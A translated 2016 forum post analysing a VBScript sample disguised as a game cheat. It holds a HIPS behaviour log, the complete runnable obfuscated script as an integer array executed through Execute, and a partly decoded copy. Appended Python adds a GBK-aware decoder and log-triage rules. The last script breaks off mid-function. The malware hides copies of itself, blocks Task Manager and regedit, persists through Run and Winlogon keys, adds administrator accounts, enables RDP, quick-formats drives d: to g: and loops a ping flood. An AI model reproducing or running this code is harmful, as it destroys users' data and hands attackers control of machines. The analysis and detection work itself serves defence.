
[Malware sample] A low-tech extortion job that looks very destructive. Warning: do not run it on a real machine!

zhou0197
Posted on 2016-3-28 21:57:44
Last edited by zhou0197 on 2016-3-28 22:13

Sample attached:

Do NOT run this on a real machine!!!!!

Some AV products flag it as Ramnit, but the VM test did not seem to show any related behaviour? Be careful, everyone!

Partial behaviour observed in the VM:

2016-3-28 21:21:29    Create new process    Allowed
Process: c:\windows\explorer.exe
Target: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
Command line: "C:\Documents and Settings\zhou\桌面\由乃CF20透视辅助.exe"
Rule: [Application]*

2016-3-28 21:21:30    Create new process    Allowed
Process: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
Target: c:\windows\system32\conime.exe
Command line: C:\WINDOWS\system32\conime.exe
Rule: [Application]*

2016-3-28 21:21:34    Create file    Allowed
Process: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
Target: C:\Documents and Settings\zhou\Local Settings\Temp\1.tmp\svchost.vbs
Rule: [File group]All executable files -> [File]*; *.vbs

2016-3-28 21:21:36    Send message to another process    Allowed
Process: c:\windows\system32\conime.exe
Target: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
Message: WM_COPYDATA
Rule: [Application]*

2016-3-28 21:21:42    Create new process    Allowed
Process: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
Target: c:\windows\system32\cscript.exe
Command line: "cscript" "C:\Documents and Settings\zhou\Local Settings\Temp\1.tmp\svchost.vbs"
Rule: [Application]*

2016-3-28 21:21:43    Send message to another process    Allowed
Process: c:\windows\system32\conime.exe
Target: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
Message: WM_COPYDATA
Rule: [Application]*

2016-3-28 21:21:49    Create file    Allowed
Process: c:\windows\system32\cscript.exe
Target: C:\svchost.vbs
Rule: [File]?:\

2016-3-28 21:21:52    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\attrib.exe
Command line: "C:\WINDOWS\system32\attrib.exe" +s +h +a +r c:\svchost.vbs
Rule: [Application]*

2016-3-28 21:21:54    Send message to another process    Allowed
Process: c:\windows\system32\conime.exe
Target: c:\windows\system32\attrib.exe
Message: WM_COPYDATA
Rule: [Application]*

2016-3-28 21:21:57    Create file    Allowed
Process: c:\windows\system32\cscript.exe
Target: C:\windows\system32\svchost.vbs
Rule: [File group]All executable files -> [File]*; *.vbs

2016-3-28 21:21:59    Set file hidden attribute    Allowed
Process: c:\windows\system32\attrib.exe
Target: C:\svchost.vbs
Rule: [File]?:\

2016-3-28 21:22:02    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\attrib.exe
Command line: "C:\WINDOWS\system32\attrib.exe" +s +h +a +r c:\windows\system32\svchost.vbs
Rule: [Application]*

2016-3-28 21:22:03    Send message to another process    Allowed
Process: c:\windows\system32\conime.exe
Target: c:\windows\system32\attrib.exe
Message: WM_COPYDATA
Rule: [Application]*

2016-3-28 21:22:15    Modify registry value    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
Value: 0x00000001(1)
Rule: [Registry group]System settings -> [Registry]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\*

2016-3-28 21:22:18    Set file hidden attribute    Allowed
Process: c:\windows\system32\attrib.exe
Target: C:\WINDOWS\system32\svchost.vbs
Rule: [File group]All executable files -> [File]*; *.vbs

2016-3-28 21:22:20    Modify registry value    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Value: 0x00000001(1)
Rule: [Registry group]System settings -> [Registry]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\*

2016-3-28 21:22:24    Modify registry value    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\start page
Value: http://www.abc123.com
Rule: [Registry group]IE browser settings -> [Registry]HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\*

2016-3-28 21:22:26    Create registry key    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_CURRENT_USER\software\policies\microsoft\internet explorer\control panel
Rule: [Registry group]System settings -> [Registry]HKEY_CURRENT_USER\Software\Policies\*

2016-3-28 21:22:29    Create registry key    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_CURRENT_USER\Software\Policies\Microsoft\internet explorer
Rule: [Registry group]System settings -> [Registry]HKEY_CURRENT_USER\Software\Policies\*

2016-3-28 21:22:30    Create registry key    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_CURRENT_USER\Software\Policies\Microsoft\internet explorer\control panel
Rule: [Registry group]System settings -> [Registry]HKEY_CURRENT_USER\Software\Policies\*

2016-3-28 21:22:33    Modify registry value    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_CURRENT_USER\Software\Policies\Microsoft\internet explorer\control panel\homepage
Value: 0x00000001(1)
Rule: [Registry group]System settings -> [Registry]HKEY_CURRENT_USER\Software\Policies\*

2016-3-28 21:22:36    Modify registry value    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svchost
Value: c:\svchost.vbs
Rule: [Registry group]Autorun program locations -> [Registry]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*

2016-3-28 21:22:45    Modify registry value    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
Value: c:\windows\system32\svchost.vbs
Rule: [Registry group]Autorun program locations -> [Registry]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon; Shell

2016-3-28 21:23:01    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c net user administrator TakaHirozen.521
Rule: [Application]*

2016-3-28 21:23:09    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c net user QQ962308082 ToyaAkira.521 /add
Rule: [Application]*

2016-3-28 21:23:18    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\net.exe
Command line: net user administrator TakaHirozen.521
Rule: [Application]*

2016-3-28 21:23:20    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c net localgroup administrators QQ962308082 /add
Rule: [Application]*

2016-3-28 21:23:23    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\net.exe
Command line: net user QQ962308082 ToyaAkira.521 /add
Rule: [Application]*

2016-3-28 21:23:28    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c net user 重装系统会 Kikyo.net /add
Rule: [Application]*

2016-3-28 21:23:32    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\net.exe
Command line: net localgroup administrators QQ962308082 /add
Rule: [Application]*

2016-3-28 21:23:39    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c net user 格式化全硬盘 Mirainikki /add
Rule: [Application]*

2016-3-28 21:23:44    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\net.exe
Command line: net user 重装系统会 Kikyo.net /add
Rule: [Application]*

2016-3-28 21:23:56    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c format d: /q /u /x /y
Rule: [Application]*

2016-3-28 21:23:59    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\net.exe
Command line: net user 格式化全硬盘 Mirainikki /add
Rule: [Application]*

2016-3-28 21:24:04    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c format e: /q /u /x /y
Rule: [Application]*

2016-3-28 21:24:07    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\format.com
Command line: format d: /q /u /x /y
Rule: [Application]*

2016-3-28 21:24:09    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c format f: /q /u /x /y
Rule: [Application]*

2016-3-28 21:24:11    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\format.com
Command line: format e: /q /u /x /y
Rule: [Application]*

2016-3-28 21:24:12    Low-level disk read    Allowed
Process: c:\windows\system32\format.com
Target: \Device\HarddiskVolume2
Rule: [Application]*

2016-3-28 21:24:14    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c format g: /q /u /x /y
Rule: [Application]*

2016-3-28 21:24:16    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\format.com
Command line: format f: /q /u /x /y
Rule: [Application]*

2016-3-28 21:24:16    Low-level disk read    Allowed
Process: c:\windows\system32\format.com
Target: \Device\HarddiskVolume3
Rule: [Application]*

2016-3-28 21:24:21    Low-level disk read    Allowed
Process: c:\windows\system32\format.com
Target: \Device\HarddiskVolume2
Rule: [Application]*

2016-3-28 21:24:22    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\format.com
Command line: format g: /q /u /x /y
Rule: [Application]*

2016-3-28 21:24:26    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\ping.exe
Command line: "C:\WINDOWS\system32\ping.exe" -t -l 65000 192.168.1.1
Rule: [Application]*

2016-3-28 21:24:27    Low-level disk read    Allowed
Process: c:\windows\system32\format.com
Target: \Device\HarddiskVolume3
Rule: [Application]*

2016-3-28 21:24:28    Low-level disk read    Allowed
Process: c:\windows\system32\format.com
Target: \Device\HarddiskVolume2
Rule: [Application]*

2016-3-28 21:24:29    Send message to another process    Allowed
Process: c:\windows\system32\conime.exe
Target: c:\windows\system32\ping.exe
Message: WM_COPYDATA
Rule: [Application]*

2016-3-28 21:24:31    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\ping.exe
Command line: "C:\WINDOWS\system32\ping.exe" -t -l 65000 192.168.1.1
Rule: [Application]*

2016-3-28 21:24:34    Low-level disk read    Allowed
Process: c:\windows\system32\format.com
Target: \Device\HarddiskVolume3
Rule: [Application]*

2016-3-28 21:24:38    Send message to another process    Allowed
Process: c:\windows\system32\conime.exe
Target: c:\windows\system32\ping.exe
Message: WM_COPYDATA
Rule: [Application]*

2016-3-28 21:24:40    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\ping.exe
Command line: "C:\WINDOWS\system32\ping.exe" -t -l 65000 192.168.1.1
Rule: [Application]*

2016-3-28 21:24:45    Low-level disk write    Allowed
Process: c:\windows\system32\format.com
Target: \Device\HarddiskVolume2
Rule: [Application]*

2016-3-28 21:25:24    Create new process    Allowed
Process: c:\windows\system32\ping.exe
Target: c:\windows\system32\conime.exe
Command line: C:\WINDOWS\system32\conime.exe
Rule: [Application]*


Core VBS source:

HqwStr = Array(13,10,13,10,83,101,116,32,111,98,106,70,83,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,13,10,13,10,83,101,116,32,111,98,106,70,83,79,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,13,10,13,10,115,101,116,32,119,115,104,61,119,115,99,114,105,112,116,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,119,115,99,114,105,112,116,46,115,104,101,108,108,34,41,13,10,13,10,115,101,116,32,114,101,103,61,119,115,99,114,105,112,116,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,119,115,99,114,105,112,116,46,115,104,101,108,108,34,41,13,10,13,10,100,105,109,32,119,115,104,13,10,13,10,97,61,87,83,99,114,105,112,116,46,83,99,114,105,112,116,70,117,108,108,78,97,109,101,13,10,13,10,99,61,34,99,58,92,115,118,99,104,111,115,116,46,118,98,115,34,13,10,13,10,115,61,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,13,10,13,10,99,49,61,34,97,116,116,114,105,98,32,43,115,32,43,104,32,43,97,32,43,114,32,99,58,92,115,118,99,104,111,115,116,46,118,98,115,34,13,10,13,10,115,49,61,34,97,116,116,114,105,98,32,43,115,32,43,104,32,43,97,32,43,114,32,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,13,10,13,10,73,102,32,111,98,106,70,83,79,46,70,105,108,101,69,120,105,115,116,115,32,40,99,41,32,84,104,101,110,13,10,13,10,69,108,115,101,13,10,13,10,111,98,106,70,115,46,71,101,116,70,105,108,101,32,40,97,41,46,67,111,112,121,32,40,99,41,13,10,13,10,119,115,104,46,114,117,110,32,99,49,13,10,13,10,69,110,100,32,73,102,13,10,13,10,73,102,32,111,98,106,70,83,79,46,70,105,108,101,69,120,105,115,116,115,40,115,41,32,84,104,101,110,13,10,13,10,69,108,115,101,13,10,13,10,111,98,106,70,115,46,71,101,116,70,105,108,101,32,40
,97,41,46,67,111,112,121,32,40,115,41,13,10,13,10,119,115,104,46,114,117,110,32,115,49,13,10,13,10,69,110,100,32,73,102,13,10,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,80,111,108,105,99,105,101,115,92,83,121,115,116,101,109,92,68,105,115,97,98,108,101,82,101,103,105,115,116,114,121,84,111,111,108,115,34,44,34,48,48,48,48,48,48,48,49,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,80,111,108,105,99,105,101,115,92,83,121,115,116,101,109,92,68,105,115,97,98,108,101,84,97,115,107,77,103,114,34,44,34,48,48,48,48,48,48,48,49,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,115,111,102,116,119,97,114,101,92,109,105,99,114,111,115,111,102,116,92,105,110,116,101,114,110,101,116,32,101,120,112,108,111,114,101,114,92,109,97,105,110,92,115,116,97,114,116,32,112,97,103,101,34,44,34,104,116,116,112,58,47,47,119,119,119,46,97,98,99,49,50,51,46,99,111,109,34,44,34,82,69,71,95,83,90,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,115,111,102,116,119,97,114,101,92,112,111,108,105,99,105,101,115,92,109,105,99,114,111,115,111,102,116,92,105,110,116,101,114,110,101,116,32,101,120,112,108,111,114,101,114,92,99,111,110,116,114,111,108,32,112,97,110,101,108,92,104,111,109,101,112,97,103,101,34,44,34,48,48,48,48,48,48,48,49,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101
,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,80,111,108,105,99,105,101,115,92,101,120,112,108,111,114,101,114,92,78,111,68,101,115,107,116,111,112,34,44,34,48,48,48,48,48,48,48,49,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,80,111,108,105,99,105,101,115,92,101,120,112,108,111,114,101,114,92,78,111,68,114,105,118,101,115,34,44,34,48,48,48,48,48,48,49,48,48,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,92,115,118,99,104,111,115,116,34,44,34,99,58,92,115,118,99,104,111,115,116,46,118,98,115,34,44,34,82,69,71,95,83,90,34,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,83,101,114,118,105,99,101,115,92,115,118,99,104,111,115,116,34,44,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,44,34,82,69,71,95,83,90,34,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,76,79,67,65,76,95,77,65,67,72,73,78,69,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,8
2,117,110,83,101,114,118,105,99,101,115,92,115,118,99,104,111,115,116,34,44,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,44,34,82,69,71,95,83,90,34,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,76,79,67,65,76,95,77,65,67,72,73,78,69,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,32,78,84,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,87,105,110,108,111,103,111,110,92,115,104,101,108,108,34,44,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,44,34,82,69,71,95,83,90,34,13,10,100,105,109,32,119,115,104,101,108,108,13,10,115,101,116,32,119,115,104,101,108,108,61,99,114,101,97,116,101,111,98,106,101,99,116,40,34,119,115,99,114,105,112,116,46,115,104,101,108,108,34,41,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,117,115,101,114,32,97,100,109,105,110,105,115,116,114,97,116,111,114,32,84,97,107,97,72,105,114,111,122,101,110,46,53,50,49,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,117,115,101,114,32,81,81,57,54,50,51,48,56,48,56,50,32,84,111,121,97,65,107,105,114,97,46,53,50,49,32,47,97,100,100,34,32,44,118,98,104,105,100,101,32,32,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,81,81,57,54,50,51,48,56,48,56,50,32,47,97,100,100,34,32,44,118,98,104,105,100,101,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,117,115,101,114,32,-10536,-10320,-12363,-12877,-17439,32,75,105,107,121,111,46,110,101,116,32,47,97,100,100,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,117,115,101,114,32,-18191,-13635,-17489,-14165,-11342,-14900,32,77,105,114,
97,105,110,105,107,107,105,32,47,97,100,100,34,32,32,13,10,119,115,104,101,108,108,46,82,101,103,87,114,105,116,101,32,34,72,75,76,77,92,83,89,83,84,69,77,92,67,117,114,114,101,110,116,67,111,110,116,114,111,108,83,101,116,92,67,111,110,116,114,111,108,92,84,101,114,109,105,110,97,108,32,83,101,114,118,101,114,92,102,68,101,110,121,84,83,67,111,110,110,101,99,116,105,111,110,115,34,44,48,44,34,82,69,71,95,68,87,79,82,68,34,32,32,32,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,102,111,114,109,97,116,32,100,58,32,47,113,32,47,117,32,47,120,32,47,121,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,102,111,114,109,97,116,32,101,58,32,47,113,32,47,117,32,47,120,32,47,121,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,102,111,114,109,97,116,32,102,58,32,47,113,32,47,117,32,47,120,32,47,121,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,102,111,114,109,97,116,32,103,58,32,47,113,32,47,117,32,47,120,32,47,121,34,13,10,115,101,116,32,119,115,104,101,108,108,61,110,111,116,104,105,110,103,13,10,100,111,13,10,119,115,104,46,114,117,110,32,40,34,112,105,110,103,32,45,116,32,45,108,32,54,53,48,48,48,32,49,57,50,46,49,54,56,46,49,46,49,34,41,13,10,108,111,111,112,13,10,13,10)
Execute Num2Str(HqwStr)
Function Num2Str(HqwStr)
For I=0 To UBound(HqwStr)
Num2Str = Num2Str & Chr(HqwStr(I))
Next
End Function

Partially decoded source:

Set objFS = CreateObject("Scripting.FileSystemObject")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set wsh=wscript.createobject("wscript.shell")
set reg=wscript.createobject("wscript.shell")
dim wsh
a=WScript.ScriptFullName
' two copies of itself: one in the root of C:, one in system32, both hidden with attrib
c="c:\svchost.vbs"
s="c:\windows\system32\svchost.vbs"
c1="attrib +s +h +a +r c:\svchost.vbs"
s1="attrib +s +h +a +r c:\windows\system32\svchost.vbs"
If objFSO.FileExists (c) Then
Else
objFs.GetFile (a).Copy (c)
wsh.run c1
End If
If objFSO.FileExists(s) Then
Else
objFs.GetFile (a).Copy (s)
wsh.run s1
End If
' lock the user out of regedit and Task Manager, then hijack the IE start page
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\software\microsoft\internet explorer\main\start page","http://www.abc123.com","REG_SZ"
reg.regwrite"HKEY_CU


Running it in the VM produced disk-formatting behaviour. Do NOT run this on a real machine!!!!


Rating: 1 participant, Experience +20
绯色鎏金 +20: The board is better with you here :)
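The core script above hides its real body as a list of integers pushed through Chr(). The negative entries are the part worth understanding: on a Chinese-locale Windows, Chr() of a negative 16-bit value yields a GBK double-byte character, which is how the account names 重装系统会 and 格式化全硬盘 in the net user commands are kept out of plain sight. The Python below is an added example, not code from the post or from the sample itself. It reproduces Num2Str with that GBK behaviour, gives the inverse encoder, pulls the integer list out of an `Array(...)` statement, and runs a regex pass over the decoded text for `.run` commands and `.regwrite` targets. The short array fragment is copied from the posted HqwStr; the longer sample script is constructed here by re-encoding a few lines of the decoded source, and the GBK code page is an assumption about the author's locale.

```python
"""Num2Str in Python, with the GBK behaviour of VBScript's Chr().

Added example, not code from the post or from the sample itself.
"""
import re

CODEPAGE = "gbk"   # assumption: the sample was written on a Chinese-locale Windows


def chr_vbs(n: int, codepage: str = CODEPAGE) -> str:
    """Mimic VBScript Chr(n) under a DBCS ANSI code page.

    0-127 are ASCII; 128-255 are a single ANSI byte; anything else is
    taken as a signed 16-bit value whose two bytes form a lead/trail
    pair, so Chr(-10536) -> bytes D6 D8 -> "重" under GBK.
    """
    if 0 <= n < 128:
        return chr(n)
    if 0 <= n < 256:
        return bytes([n]).decode(codepage, errors="replace")
    code = n & 0xFFFF
    return code.to_bytes(2, "big").decode(codepage, errors="replace")


def num2str(values) -> str:
    """Same job as the sample's Num2Str: concatenate Chr() of every entry."""
    return "".join(chr_vbs(v) for v in values)


def str2num(text: str, codepage: str = CODEPAGE) -> list:
    """Inverse of num2str: how an array like HqwStr is produced."""
    out = []
    for ch in text:
        b = ch.encode(codepage)
        if len(b) == 1:
            out.append(b[0])
        else:
            v = int.from_bytes(b, "big")
            out.append(v - 0x10000 if v >= 0x8000 else v)   # fold to signed 16-bit
    return out


def parse_array(vbs_text: str) -> list:
    """Pull the integer list out of the first `Array(...)` in a VBS file."""
    m = re.search(r"Array\((.*?)\)", vbs_text, re.S)
    body = m.group(1) if m else ""
    return [int(t) for t in re.findall(r"-?\d+", body)]


# Fragment copied from the posted HqwStr: "net user <DBCS name> Kikyo.net /add".
POSTED_FRAGMENT = [110, 101, 116, 32, 117, 115, 101, 114, 32,
                   -10536, -10320, -12363, -12877, -17439,
                   32, 75, 105, 107, 121, 111, 46, 110, 101, 116, 32, 47, 97, 100, 100]

# Constructed sample: a few lines of the decoded script, re-encoded the same way.
DECODED_SAMPLE = (
    'reg.regwrite"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost","c:\\svchost.vbs","REG_SZ"\r\n'
    'wshell.run "cmd /c net user 重装系统会 Kikyo.net /add"\r\n'
    'wshell.RegWrite "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",0,"REG_DWORD"\r\n'
    'wshell.run "cmd /c format d: /q /u /x /y"\r\n'
    'do\r\nwsh.run ("ping -t -l 65000 192.168.1.1")\r\nloop\r\n'
)
ENCODED_SAMPLE = ("HqwStr = Array(" + ",".join(map(str, str2num(DECODED_SAMPLE))) + ")\r\n"
                  "Execute Num2Str(HqwStr)\r\n")

CMD_RE = re.compile(r'\.run\s*\(?\s*"([^"]+)"', re.I)
REG_RE = re.compile(r'\.regwrite\s*"([^"]+)"\s*,\s*(?:"([^"]*)"|(-?\d+))', re.I)


def extract_iocs(script: str) -> dict:
    """Shell commands and registry writes found in a decoded script."""
    registry = []
    for m in REG_RE.finditer(script):
        value = m.group(2) if m.group(2) is not None else m.group(3)
        registry.append((m.group(1), value))
    return {"commands": CMD_RE.findall(script), "registry": registry}


def decode_sample(vbs_text: str) -> dict:
    """Full pipeline: Array(...) text -> script -> commands and registry writes."""
    script = num2str(parse_array(vbs_text))
    return {"script": script, **extract_iocs(script)}


if __name__ == "__main__":
    print(num2str(POSTED_FRAGMENT))
    result = decode_sample(ENCODED_SAMPLE)
    for cmd in result["commands"]:
        print("RUN ", cmd)
    for key, value in result["registry"]:
        print("REG ", key, "=", value)
```

To use it on the real file, read the posted script into a string and call `decode_sample` on it; `errors="replace"` keeps decoding going if an entry does not form a valid GBK pair, so a wrong code-page guess shows up as replacement characters rather than an exception.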
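The HIPS log in the post shows the whole chain in order: cscript.exe launched on the dropped svchost.vbs, attrib +s +h on both copies, the policy keys that disable regedit and Task Manager, Run-key and Winlogon\Shell persistence, net user / net localgroup, and finally format.com against the data volumes. As an added example that is not part of the original post, here is a small Python triage script for that log format: it parses each `date time    action    verdict` header plus its `Key: value` lines into an event, then flags the behaviours above with rules whose names are this example's own choice. The sample records are copied from the post's log and reformatted as a constructed input.

```python
"""Triage rules for the HIPS behaviour log format shown in the post.

Added example, not part of the original post. Rule names are this
example's own; the sample records are copied from the posted log.
"""
import re
from collections import Counter
from dataclasses import dataclass, field


@dataclass
class Event:
    time: str
    action: str
    verdict: str
    fields: dict = field(default_factory=dict)


def parse_log(text: str) -> list:
    """Split the log into Event records (blank-line separated)."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        if not lines:
            continue
        head = re.split(r"\s{2,}", lines[0])      # "date time", action, verdict
        if len(head) != 3:
            continue                               # not a record header; skip it
        ev = Event(*head)
        for ln in lines[1:]:
            key, sep, val = ln.partition(": ")
            if sep:
                ev.fields[key] = val
        events.append(ev)
    return events


# (rule name, regex, which field of the event it is applied to)
RULES = [
    ("disk-format",                r"\bformat(\.com)?\s+[a-z]:",                        "Command line"),
    ("account-manipulation",       r"\bnet\s+(user|localgroup)\b",                      "Command line"),
    ("attrib-hide",                r"\battrib\b.*\+h",                                  "Command line"),
    ("winlogon-shell-persistence", r"\\Winlogon\\shell$",                               "Target"),
    ("run-key-persistence",        r"\\CurrentVersion\\Run(Services)?\\",               "Target"),
    ("disable-admin-tools",        r"\\Policies\\System\\(DisableTaskMgr|DisableRegistryTools)$", "Target"),
    ("script-host-launch",         r"\\cscript\.exe$",                                  "Target"),
]
COMPILED = [(name, re.compile(rx, re.I), fld) for name, rx, fld in RULES]


def triage(events) -> list:
    """One finding per (event, rule) hit, in log order."""
    findings = []
    for ev in events:
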